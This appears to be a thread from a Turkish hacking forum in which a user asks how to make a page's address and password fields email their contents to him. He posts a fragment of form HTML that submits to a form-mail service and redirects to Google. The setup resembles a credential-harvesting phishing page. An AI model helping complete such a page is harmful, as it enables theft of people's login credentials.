sayfadaki boşluklara veri girildiğinde mail adresime gelmesini istiyorum

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

adahan

Yeni üye
10 Ağu 2009
17
0
alttaki linkte adres ve şifre yazabileceğimiz bi sayfa var sayfadaki boşluklara veri girildiğinde mail adresime gelmesini istiyorum ama nasıl yapabileceğimi bilmiyorum lütfen bilen arkadaşımız bana yardım edebilirmi ???

Zippyshare.com - jotform.htm

Moderatör tarafında düzenlendi:

By KaLicH

Katılımcı Üye
30 Ocak 2012
728
0
Geldiği Bilinmiyor
Merhaba Öncelikle kardesim Jotform Anket yapmakda kolaylık saglanması için yapılmıştır.Giriş butonuna Tıkladıgında girdikleri bilgiler Senin jotform a uye oldugun msn adresine gönderilir.

İyi forumlar...

adahan

Yeni üye
10 Ağu 2009
17
0
evet biliyorum ama genelde sayfa açılmıyor bu yüzdende ben kendim yapayım diyorum tek sorun formmail kodlarını nereye koyacağımı sölemeniz yeter...

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="turkmennn">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.google.com">

Son düzenleme:
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.